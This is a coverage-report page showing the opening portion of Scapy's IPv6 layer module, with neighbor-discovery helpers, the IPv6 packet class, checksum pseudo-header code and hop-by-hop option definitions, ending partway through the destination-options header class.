Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.8/site-packages/scapy/layers/inet6.py: 52%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1792 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp> 

5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net> 

6 

7# Cool history about this file: http://natisbad.org/scapy/index.html 

8 

9 

10""" 

11IPv6 (Internet Protocol v6). 

12""" 

13 

14 

15from hashlib import md5 

16import random 

17import socket 

18import struct 

19from time import gmtime, strftime 

20 

21from scapy.arch import get_if_hwaddr 

22from scapy.as_resolvers import AS_resolver_riswhois 

23from scapy.base_classes import Gen 

24from scapy.compat import chb, orb, raw, plain_str, bytes_encode 

25from scapy.consts import WINDOWS 

26from scapy.config import conf 

27from scapy.data import ( 

28 DLT_IPV6, 

29 DLT_RAW, 

30 DLT_RAW_ALT, 

31 ETHER_ANY, 

32 ETH_P_ALL, 

33 ETH_P_IPV6, 

34 MTU, 

35) 

36from scapy.error import log_runtime, warning 

37from scapy.fields import ( 

38 BitEnumField, 

39 BitField, 

40 ByteEnumField, 

41 ByteField, 

42 DestIP6Field, 

43 FieldLenField, 

44 FlagsField, 

45 IntField, 

46 IP6Field, 

47 LongField, 

48 MACField, 

49 MayEnd, 

50 PacketLenField, 

51 PacketListField, 

52 ShortEnumField, 

53 ShortField, 

54 SourceIP6Field, 

55 StrField, 

56 StrFixedLenField, 

57 StrLenField, 

58 X3BytesField, 

59 XBitField, 

60 XByteField, 

61 XIntField, 

62 XShortField, 

63) 

64from scapy.layers.inet import ( 

65 _ICMPExtensionField, 

66 _ICMPExtensionPadField, 

67 _ICMP_extpad_post_dissection, 

68 IP, 

69 IPTools, 

70 TCP, 

71 TCPerror, 

72 TracerouteResult, 

73 UDP, 

74 UDPerror, 

75) 

76from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP 

77from scapy.packet import bind_layers, Packet, Raw 

78from scapy.sendrecv import sendp, sniff, sr, srp1 

79from scapy.supersocket import SuperSocket 

80from scapy.utils import checksum, strxor 

81from scapy.pton_ntop import inet_pton, inet_ntop 

82from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 

83 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 

84 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 

85from scapy.volatile import RandInt, RandShort 

86 

87if not socket.has_ipv6: 

88 raise socket.error("can't use AF_INET6, IPv6 is disabled") 

89if not hasattr(socket, "IPPROTO_IPV6"): 

90 # Workaround for http://bugs.python.org/issue6926 

91 socket.IPPROTO_IPV6 = 41 

92if not hasattr(socket, "IPPROTO_IPIP"): 

93 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 

94 socket.IPPROTO_IPIP = 4 

95 

96if conf.route6 is None: 

97 # unused import, only to initialize conf.route6 

98 import scapy.route6 # noqa: F401 

99 

100########################## 

101# Neighbor cache stuff # 

102########################## 

103 

104conf.netcache.new_cache("in6_neighbor", 120) 

105 

106 

107@conf.commands.register 

108def neighsol(addr, src, iface, timeout=1, chainCC=0): 

109 """Sends and receive an ICMPv6 Neighbor Solicitation message 

110 

111 This function sends an ICMPv6 Neighbor Solicitation message 

112 to get the MAC address of the neighbor with specified IPv6 address address. 

113 

114 'src' address is used as the source IPv6 address of the message. Message 

115 is sent on 'iface'. The source MAC address is retrieved accordingly. 

116 

117 By default, timeout waiting for an answer is 1 second. 

118 

119 If no answer is gathered, None is returned. Else, the answer is 

120 returned (ethernet frame). 

121 """ 

122 

123 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 

124 d = inet_ntop(socket.AF_INET6, nsma) 

125 dm = in6_getnsmac(nsma) 

126 sm = get_if_hwaddr(iface) 

127 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255) 

128 p /= ICMPv6ND_NS(tgt=addr) 

129 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm) 

130 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0, 

131 chainCC=chainCC) 

132 

133 return res 

134 

135 

136@conf.commands.register 

137def getmacbyip6(ip6, chainCC=0): 

138 """Returns the MAC address corresponding to an IPv6 address 

139 

140 neighborCache.get() method is used on instantiated neighbor cache. 

141 Resolution mechanism is described in associated doc string. 

142 

143 (chainCC parameter value ends up being passed to sending function 

144 used to perform the resolution, if needed) 

145 """ 

146 

147 if isinstance(ip6, Net6): 

148 ip6 = str(ip6) 

149 

150 if in6_ismaddr(ip6): # Multicast 

151 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 

152 return mac 

153 

154 iff, a, nh = conf.route6.route(ip6) 

155 

156 if iff == conf.loopback_name: 

157 return "ff:ff:ff:ff:ff:ff" 

158 

159 if nh != '::': 

160 ip6 = nh # Found next hop 

161 

162 mac = conf.netcache.in6_neighbor.get(ip6) 

163 if mac: 

164 return mac 

165 

166 res = neighsol(ip6, a, iff, chainCC=chainCC) 

167 

168 if res is not None: 

169 if ICMPv6NDOptDstLLAddr in res: 

170 mac = res[ICMPv6NDOptDstLLAddr].lladdr 

171 else: 

172 mac = res.src 

173 conf.netcache.in6_neighbor[ip6] = mac 

174 return mac 

175 

176 return None 

177 

178 

179############################################################################# 

180############################################################################# 

181# IPv6 Class # 

182############################################################################# 

183############################################################################# 

184 

185ipv6nh = {0: "Hop-by-Hop Option Header", 

186 4: "IP", 

187 6: "TCP", 

188 17: "UDP", 

189 41: "IPv6", 

190 43: "Routing Header", 

191 44: "Fragment Header", 

192 47: "GRE", 

193 50: "ESP Header", 

194 51: "AH Header", 

195 58: "ICMPv6", 

196 59: "No Next Header", 

197 60: "Destination Option Header", 

198 112: "VRRP", 

199 132: "SCTP", 

200 135: "Mobility Header"} 

201 

202ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 

203 4: "IP", 

204 6: "TCP", 

205 17: "UDP", 

206 43: "IPv6ExtHdrRouting", 

207 44: "IPv6ExtHdrFragment", 

208 50: "ESP", 

209 51: "AH", 

210 58: "ICMPv6Unknown", 

211 59: "Raw", 

212 60: "IPv6ExtHdrDestOpt"} 

213 

214 

215class IP6ListField(StrField): 

216 __slots__ = ["count_from", "length_from"] 

217 islist = 1 

218 

219 def __init__(self, name, default, count_from=None, length_from=None): 

220 if default is None: 

221 default = [] 

222 StrField.__init__(self, name, default) 

223 self.count_from = count_from 

224 self.length_from = length_from 

225 

226 def i2len(self, pkt, i): 

227 return 16 * len(i) 

228 

229 def i2count(self, pkt, i): 

230 if isinstance(i, list): 

231 return len(i) 

232 return 0 

233 

234 def getfield(self, pkt, s): 

235 c = tmp_len = None 

236 if self.length_from is not None: 

237 tmp_len = self.length_from(pkt) 

238 elif self.count_from is not None: 

239 c = self.count_from(pkt) 

240 

241 lst = [] 

242 ret = b"" 

243 remain = s 

244 if tmp_len is not None: 

245 remain, ret = s[:tmp_len], s[tmp_len:] 

246 while remain: 

247 if c is not None: 

248 if c <= 0: 

249 break 

250 c -= 1 

251 addr = inet_ntop(socket.AF_INET6, remain[:16]) 

252 lst.append(addr) 

253 remain = remain[16:] 

254 return remain + ret, lst 

255 

256 def i2m(self, pkt, x): 

257 s = b"" 

258 for y in x: 

259 try: 

260 y = inet_pton(socket.AF_INET6, y) 

261 except Exception: 

262 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 

263 y = inet_pton(socket.AF_INET6, y) 

264 s += y 

265 return s 

266 

267 def i2repr(self, pkt, x): 

268 s = [] 

269 if x is None: 

270 return "[]" 

271 for y in x: 

272 s.append('%s' % y) 

273 return "[ %s ]" % (", ".join(s)) 

274 

275 

276class _IPv6GuessPayload: 

277 name = "Dummy class that implements guess_payload_class() for IPv6" 

278 

279 def default_payload_class(self, p): 

280 if self.nh == 58: # ICMPv6 

281 t = orb(p[0]) 

282 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 

283 return _niquery_guesser(p) 

284 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 

285 if t == 130 and len(p) >= 28: 

286 # RFC 3810 - 8.1. Query Version Distinctions 

287 return ICMPv6MLQuery2 

288 return icmp6typescls.get(t, Raw) 

289 return Raw 

290 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 

291 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 

292 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 

293 return IPv6ExtHdrSegmentRouting 

294 return ipv6nhcls.get(self.nh, Raw) 

295 

296 

297class IPv6(_IPv6GuessPayload, Packet, IPTools): 

298 name = "IPv6" 

299 fields_desc = [BitField("version", 6, 4), 

300 BitField("tc", 0, 8), 

301 BitField("fl", 0, 20), 

302 ShortField("plen", None), 

303 ByteEnumField("nh", 59, ipv6nh), 

304 ByteField("hlim", 64), 

305 SourceIP6Field("src", "dst"), # dst is for src @ selection 

306 DestIP6Field("dst", "::1")] 

307 

308 def route(self): 

309 """Used to select the L2 address""" 

310 dst = self.dst 

311 if isinstance(dst, Gen): 

312 dst = next(iter(dst)) 

313 return conf.route6.route(dst) 

314 

315 def mysummary(self): 

316 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 

317 

318 def post_build(self, p, pay): 

319 p += pay 

320 if self.plen is None: 

321 tmp_len = len(p) - 40 

322 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] 

323 return p 

324 

325 def extract_padding(self, data): 

326 """Extract the IPv6 payload""" 

327 

328 if self.plen == 0 and self.nh == 0 and len(data) >= 8: 

329 # Extract Hop-by-Hop extension length 

330 hbh_len = orb(data[1]) 

331 hbh_len = 8 + hbh_len * 8 

332 

333 # Extract length from the Jumbogram option 

334 # Note: the following algorithm take advantage of the Jumbo option 

335 # mandatory alignment (4n + 2, RFC2675 Section 2) 

336 jumbo_len = None 

337 idx = 0 

338 offset = 4 * idx + 2 

339 while offset <= len(data): 

340 opt_type = orb(data[offset]) 

341 if opt_type == 0xc2: # Jumbo option 

342 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 

343 break 

344 offset = 4 * idx + 2 

345 idx += 1 

346 

347 if jumbo_len is None: 

348 log_runtime.info("Scapy did not find a Jumbo option") 

349 jumbo_len = 0 

350 

351 tmp_len = hbh_len + jumbo_len 

352 else: 

353 tmp_len = self.plen 

354 

355 return data[:tmp_len], data[tmp_len:] 

356 

357 def hashret(self): 

358 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 

359 if self.payload.type < 128: 

360 return self.payload.payload.hashret() 

361 elif (self.payload.type in [133, 134, 135, 136, 144, 145]): 

362 return struct.pack("B", self.nh) + self.payload.hashret() 

363 

364 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 

365 return self.payload.hashret() 

366 

367 nh = self.nh 

368 sd = self.dst 

369 ss = self.src 

370 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 

371 # With routing header, the destination is the last 

372 # address of the IPv6 list if segleft > 0 

373 nh = self.payload.nh 

374 try: 

375 sd = self.addresses[-1] 

376 except IndexError: 

377 sd = '::1' 

378 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 

379 # could be anything from the original list ... 

380 if 1: 

381 sd = inet_pton(socket.AF_INET6, sd) 

382 for a in self.addresses: 

383 a = inet_pton(socket.AF_INET6, a) 

384 sd = strxor(sd, a) 

385 sd = inet_ntop(socket.AF_INET6, sd) 

386 

387 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 

388 # With segment routing header (rh == 4), the destination is 

389 # the first address of the IPv6 addresses list 

390 try: 

391 sd = self.addresses[0] 

392 except IndexError: 

393 sd = self.dst 

394 

395 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 

396 nh = self.payload.nh 

397 

398 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 

399 nh = self.payload.nh 

400 

401 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 

402 foundhao = None 

403 for o in self.payload.options: 

404 if isinstance(o, HAO): 

405 foundhao = o 

406 if foundhao: 

407 ss = foundhao.hoa 

408 nh = self.payload.nh # XXX what if another extension follows ? 

409 

410 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 

411 sd = inet_pton(socket.AF_INET6, sd) 

412 ss = inet_pton(socket.AF_INET6, ss) 

413 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 

414 else: 

415 return struct.pack("B", nh) + self.payload.hashret() 

416 

417 def answers(self, other): 

418 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 

419 if self.nh in [4, 41]: 

420 return self.payload.answers(other) 

421 if isinstance(other, IPv6) and other.nh in [4, 41]: 

422 return self.answers(other.payload) 

423 if isinstance(other, IP) and other.proto in [4, 41]: 

424 return self.answers(other.payload) 

425 if not isinstance(other, IPv6): # self is reply, other is request 

426 return False 

427 if conf.checkIPaddr: 

428 # ss = inet_pton(socket.AF_INET6, self.src) 

429 sd = inet_pton(socket.AF_INET6, self.dst) 

430 os = inet_pton(socket.AF_INET6, other.src) 

431 od = inet_pton(socket.AF_INET6, other.dst) 

432 # request was sent to a multicast address (other.dst) 

433 # Check reply destination addr matches request source addr (i.e 

434 # sd == os) except when reply is multicasted too 

435 # XXX test mcast scope matching ? 

436 if in6_ismaddr(other.dst): 

437 if in6_ismaddr(self.dst): 

438 if ((od == sd) or 

439 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 

440 return self.payload.answers(other.payload) 

441 return False 

442 if (os == sd): 

443 return self.payload.answers(other.payload) 

444 return False 

445 elif (sd != os): # or ss != od): <- removed for ICMP errors 

446 return False 

447 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 

448 # ICMPv6 Error message -> generated by IPv6 packet 

449 # Note : at the moment, we jump the ICMPv6 specific class 

450 # to call answers() method of erroneous packet (over 

451 # initial packet). There can be cases where an ICMPv6 error 

452 # class could implement a specific answers method that perform 

453 # a specific task. Currently, don't see any use ... 

454 return self.payload.payload.answers(other) 

455 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 

456 return self.payload.answers(other.payload) 

457 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 

458 return self.payload.answers(other.payload.payload) 

459 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 

460 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 

461 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 

462 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 

463 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 

464 return self.payload.answers(other.payload.payload) 

465 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 

466 return self.payload.payload.answers(other.payload) 

467 else: 

468 if (self.nh != other.nh): 

469 return False 

470 return self.payload.answers(other.payload) 

471 

472 

473class IPv46(IP): 

474 """ 

475 This class implements a dispatcher that is used to detect the IP version 

476 while parsing Raw IP pcap files. 

477 """ 

478 @classmethod 

479 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

480 if _pkt: 

481 if orb(_pkt[0]) >> 4 == 6: 

482 return IPv6 

483 elif kargs.get("version") == 6: 

484 return IPv6 

485 return IP 

486 

487 

488def inet6_register_l3(l2, l3): 

489 """ 

490 Resolves the default L2 destination address when IPv6 is used. 

491 """ 

492 return getmacbyip6(l3.dst) 

493 

494 

495conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 

496 

497 

498class IPerror6(IPv6): 

499 name = "IPv6 in ICMPv6" 

500 

501 def answers(self, other): 

502 if not isinstance(other, IPv6): 

503 return False 

504 sd = inet_pton(socket.AF_INET6, self.dst) 

505 ss = inet_pton(socket.AF_INET6, self.src) 

506 od = inet_pton(socket.AF_INET6, other.dst) 

507 os = inet_pton(socket.AF_INET6, other.src) 

508 

509 # Make sure that the ICMPv6 error is related to the packet scapy sent 

510 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 

511 

512 # find upper layer for self (possible citation) 

513 selfup = self.payload 

514 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 

515 selfup = selfup.payload 

516 

517 # find upper layer for other (initial packet). Also look for RH 

518 otherup = other.payload 

519 request_has_rh = False 

520 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 

521 if isinstance(otherup, IPv6ExtHdrRouting): 

522 request_has_rh = True 

523 otherup = otherup.payload 

524 

525 if ((ss == os and sd == od) or # < Basic case 

526 (ss == os and request_has_rh)): 

527 # ^ Request has a RH : don't check dst address 

528 

529 # Let's deal with possible MSS Clamping 

530 if (isinstance(selfup, TCP) and 

531 isinstance(otherup, TCP) and 

532 selfup.options != otherup.options): # seems clamped 

533 

534 # Save fields modified by MSS clamping 

535 old_otherup_opts = otherup.options 

536 old_otherup_cksum = otherup.chksum 

537 old_otherup_dataofs = otherup.dataofs 

538 old_selfup_opts = selfup.options 

539 old_selfup_cksum = selfup.chksum 

540 old_selfup_dataofs = selfup.dataofs 

541 

542 # Nullify them 

543 otherup.options = [] 

544 otherup.chksum = 0 

545 otherup.dataofs = 0 

546 selfup.options = [] 

547 selfup.chksum = 0 

548 selfup.dataofs = 0 

549 

550 # Test it and save result 

551 s1 = raw(selfup) 

552 s2 = raw(otherup) 

553 tmp_len = min(len(s1), len(s2)) 

554 res = s1[:tmp_len] == s2[:tmp_len] 

555 

556 # recall saved values 

557 otherup.options = old_otherup_opts 

558 otherup.chksum = old_otherup_cksum 

559 otherup.dataofs = old_otherup_dataofs 

560 selfup.options = old_selfup_opts 

561 selfup.chksum = old_selfup_cksum 

562 selfup.dataofs = old_selfup_dataofs 

563 

564 return res 

565 

566 s1 = raw(selfup) 

567 s2 = raw(otherup) 

568 tmp_len = min(len(s1), len(s2)) 

569 return s1[:tmp_len] == s2[:tmp_len] 

570 

571 return False 

572 

573 def mysummary(self): 

574 return Packet.mysummary(self) 

575 

576 

577############################################################################# 

578############################################################################# 

579# Upper Layer Checksum computation # 

580############################################################################# 

581############################################################################# 

582 

583class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation 

584 name = "Pseudo IPv6 Header" 

585 fields_desc = [IP6Field("src", "::"), 

586 IP6Field("dst", "::"), 

587 IntField("uplen", None), 

588 BitField("zero", 0, 24), 

589 ByteField("nh", 0)] 

590 

591 

592def in6_pseudoheader(nh, u, plen): 

593 # type: (int, IP, int) -> PseudoIPv6 

594 """ 

595 Build an PseudoIPv6 instance as specified in RFC 2460 8.1 

596 

597 This function operates by filling a pseudo header class instance 

598 (PseudoIPv6) with: 

599 - Next Header value 

600 - the address of _final_ destination (if some Routing Header with non 

601 segleft field is present in underlayer classes, last address is used.) 

602 - the address of _real_ source (basically the source address of an 

603 IPv6 class instance available in the underlayer or the source address 

604 in HAO option if some Destination Option header found in underlayer 

605 includes this option). 

606 - the length is the length of provided payload string ('p') 

607 

608 :param nh: value of upper layer protocol 

609 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 

610 provided with all under layers (IPv6 and all extension headers, 

611 for example) 

612 :param plen: the length of the upper layer and payload 

613 """ 

614 ph6 = PseudoIPv6() 

615 ph6.nh = nh 

616 rthdr = 0 

617 hahdr = 0 

618 final_dest_addr_found = 0 

619 while u is not None and not isinstance(u, IPv6): 

620 if (isinstance(u, IPv6ExtHdrRouting) and 

621 u.segleft != 0 and len(u.addresses) != 0 and 

622 final_dest_addr_found == 0): 

623 rthdr = u.addresses[-1] 

624 final_dest_addr_found = 1 

625 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and 

626 u.segleft != 0 and len(u.addresses) != 0 and 

627 final_dest_addr_found == 0): 

628 rthdr = u.addresses[0] 

629 final_dest_addr_found = 1 

630 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and 

631 isinstance(u.options[0], HAO)): 

632 hahdr = u.options[0].hoa 

633 u = u.underlayer 

634 if u is None: 

635 warning("No IPv6 underlayer to compute checksum. Leaving null.") 

636 return None 

637 if hahdr: 

638 ph6.src = hahdr 

639 else: 

640 ph6.src = u.src 

641 if rthdr: 

642 ph6.dst = rthdr 

643 else: 

644 ph6.dst = u.dst 

645 ph6.uplen = plen 

646 return ph6 

647 

648 

649def in6_chksum(nh, u, p): 

650 """ 

651 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums 

652 

653 See also `.in6_pseudoheader` 

654 

655 :param nh: value of upper layer protocol 

656 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 

657 provided with all under layers (IPv6 and all extension headers, 

658 for example) 

659 :param p: the payload of the upper layer provided as a string 

660 """ 

661 ph6 = in6_pseudoheader(nh, u, len(p)) 

662 if ph6 is None: 

663 return 0 

664 ph6s = raw(ph6) 

665 return checksum(ph6s + p) 

666 

667 

668############################################################################# 

669############################################################################# 

670# Extension Headers # 

671############################################################################# 

672############################################################################# 

673 

674 

675# Inherited by all extension header classes 

676class _IPv6ExtHdr(_IPv6GuessPayload, Packet): 

677 name = 'Abstract IPv6 Option Header' 

678 aliastypes = [IPv6, IPerror6] # TODO ... 

679 

680 

681# IPv6 options for Extension Headers # 

682 

683_hbhopts = {0x00: "Pad1", 

684 0x01: "PadN", 

685 0x04: "Tunnel Encapsulation Limit", 

686 0x05: "Router Alert", 

687 0x06: "Quick-Start", 

688 0xc2: "Jumbo Payload", 

689 0xc9: "Home Address Option"} 

690 

691 

692class _OTypeField(ByteEnumField): 

693 """ 

694 Modified BytEnumField that displays information regarding the IPv6 option 

695 based on its option type value (What should be done by nodes that process 

696 the option if they do not understand it ...) 

697 

698 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 

699 """ 

700 pol = {0x00: "00: skip", 

701 0x40: "01: discard", 

702 0x80: "10: discard+ICMP", 

703 0xC0: "11: discard+ICMP not mcast"} 

704 

705 enroutechange = {0x00: "0: Don't change en-route", 

706 0x20: "1: May change en-route"} 

707 

708 def i2repr(self, pkt, x): 

709 s = self.i2s.get(x, repr(x)) 

710 polstr = self.pol[(x & 0xC0)] 

711 enroutechangestr = self.enroutechange[(x & 0x20)] 

712 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 

713 

714 

715class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 

716 name = "Scapy6 Unknown Option" 

717 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 

718 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 

719 StrLenField("optdata", "", 

720 length_from=lambda pkt: pkt.optlen)] 

721 

722 def alignment_delta(self, curpos): # By default, no alignment requirement 

723 """ 

724 As specified in section 4.2 of RFC 2460, every options has 

725 an alignment requirement usually expressed xn+y, meaning 

726 the Option Type must appear at an integer multiple of x octets 

727 from the start of the header, plus y octets. 

728 

729 That function is provided the current position from the 

730 start of the header and returns required padding length. 

731 """ 

732 return 0 

733 

734 @classmethod 

735 def dispatch_hook(cls, _pkt=None, *args, **kargs): 

736 if _pkt: 

737 o = orb(_pkt[0]) # Option type 

738 if o in _hbhoptcls: 

739 return _hbhoptcls[o] 

740 return cls 

741 

742 def extract_padding(self, p): 

743 return b"", p 

744 

745 

746class Pad1(Packet): # IPv6 Hop-By-Hop Option 

747 name = "Pad1" 

748 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] 

749 

750 def alignment_delta(self, curpos): # No alignment requirement 

751 return 0 

752 

753 def extract_padding(self, p): 

754 return b"", p 

755 

756 

757class PadN(Packet): # IPv6 Hop-By-Hop Option 

758 name = "PadN" 

759 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 

760 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 

761 StrLenField("optdata", "", 

762 length_from=lambda pkt: pkt.optlen)] 

763 

764 def alignment_delta(self, curpos): # No alignment requirement 

765 return 0 

766 

767 def extract_padding(self, p): 

768 return b"", p 

769 

770 

771class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 

772 name = "Router Alert" 

773 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 

774 ByteField("optlen", 2), 

775 ShortEnumField("value", None, 

776 {0: "Datagram contains a MLD message", 

777 1: "Datagram contains RSVP message", 

778 2: "Datagram contains an Active Network message", # noqa: E501 

779 68: "NSIS NATFW NSLP", 

780 69: "MPLS OAM", 

781 65535: "Reserved"})] 

782 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 

783 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 

784 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 

785 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml 

786 

787 def alignment_delta(self, curpos): # alignment requirement : 2n+0 

788 x = 2 

789 y = 0 

790 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

791 return delta 

792 

793 def extract_padding(self, p): 

794 return b"", p 

795 

796 

797class RplOption(Packet): # RFC 6553 - RPL Option 

798 name = "RPL Option" 

799 fields_desc = [_OTypeField("otype", 0x63, _hbhopts), 

800 ByteField("optlen", 4), 

801 BitField("Down", 0, 1), 

802 BitField("RankError", 0, 1), 

803 BitField("ForwardError", 0, 1), 

804 BitField("unused", 0, 5), 

805 XByteField("RplInstanceId", 0), 

806 XShortField("SenderRank", 0)] 

807 

808 def alignment_delta(self, curpos): # alignment requirement : 2n+0 

809 x = 2 

810 y = 0 

811 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

812 return delta 

813 

814 def extract_padding(self, p): 

815 return b"", p 

816 

817 

818class Jumbo(Packet): # IPv6 Hop-By-Hop Option 

819 name = "Jumbo Payload" 

820 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), 

821 ByteField("optlen", 4), 

822 IntField("jumboplen", None)] 

823 

824 def alignment_delta(self, curpos): # alignment requirement : 4n+2 

825 x = 4 

826 y = 2 

827 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

828 return delta 

829 

830 def extract_padding(self, p): 

831 return b"", p 

832 

833 

834class HAO(Packet): # IPv6 Destination Options Header Option 

835 name = "Home Address Option" 

836 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), 

837 ByteField("optlen", 16), 

838 IP6Field("hoa", "::")] 

839 

840 def alignment_delta(self, curpos): # alignment requirement : 8n+6 

841 x = 8 

842 y = 6 

843 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

844 return delta 

845 

846 def extract_padding(self, p): 

847 return b"", p 

848 

849 

850_hbhoptcls = {0x00: Pad1, 

851 0x01: PadN, 

852 0x05: RouterAlert, 

853 0x63: RplOption, 

854 0xC2: Jumbo, 

855 0xC9: HAO} 

856 

857 

858# Hop-by-Hop Extension Header # 

859 

860class _OptionsField(PacketListField): 

861 __slots__ = ["curpos"] 

862 

863 def __init__(self, name, default, cls, curpos, *args, **kargs): 

864 self.curpos = curpos 

865 PacketListField.__init__(self, name, default, cls, *args, **kargs) 

866 

867 def i2len(self, pkt, i): 

868 return len(self.i2m(pkt, i)) 

869 

870 def i2m(self, pkt, x): 

871 autopad = None 

872 try: 

873 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 

874 except Exception: 

875 autopad = 1 

876 

877 if not autopad: 

878 return b"".join(map(bytes, x)) 

879 

880 curpos = self.curpos 

881 s = b"" 

882 for p in x: 

883 d = p.alignment_delta(curpos) 

884 curpos += d 

885 if d == 1: 

886 s += raw(Pad1()) 

887 elif d != 0: 

888 s += raw(PadN(optdata=b'\x00' * (d - 2))) 

889 pstr = raw(p) 

890 curpos += len(pstr) 

891 s += pstr 

892 

893 # Let's make the class including our option field 

894 # a multiple of 8 octets long 

895 d = curpos % 8 

896 if d == 0: 

897 return s 

898 d = 8 - d 

899 if d == 1: 

900 s += raw(Pad1()) 

901 elif d != 0: 

902 s += raw(PadN(optdata=b'\x00' * (d - 2))) 

903 

904 return s 

905 

906 def addfield(self, pkt, s, val): 

907 return s + self.i2m(pkt, val) 

908 

909 

910class _PhantomAutoPadField(ByteField): 

911 def addfield(self, pkt, s, val): 

912 return s 

913 

914 def getfield(self, pkt, s): 

915 return s, 1 

916 

917 def i2repr(self, pkt, x): 

918 if x: 

919 return "On" 

920 return "Off" 

921 

922 

923class IPv6ExtHdrHopByHop(_IPv6ExtHdr): 

924 name = "IPv6 Extension Header - Hop-by-Hop Options Header" 

925 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

926 FieldLenField("len", None, length_of="options", fmt="B", 

927 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

928 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

929 _OptionsField("options", [], HBHOptUnknown, 2, 

930 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

931 overload_fields = {IPv6: {"nh": 0}} 

932 

933 

934# Destination Option Header # 

935 

936class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 

937 name = "IPv6 Extension Header - Destination Options Header" 

938 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

939 FieldLenField("len", None, length_of="options", fmt="B", 

940 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

941 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

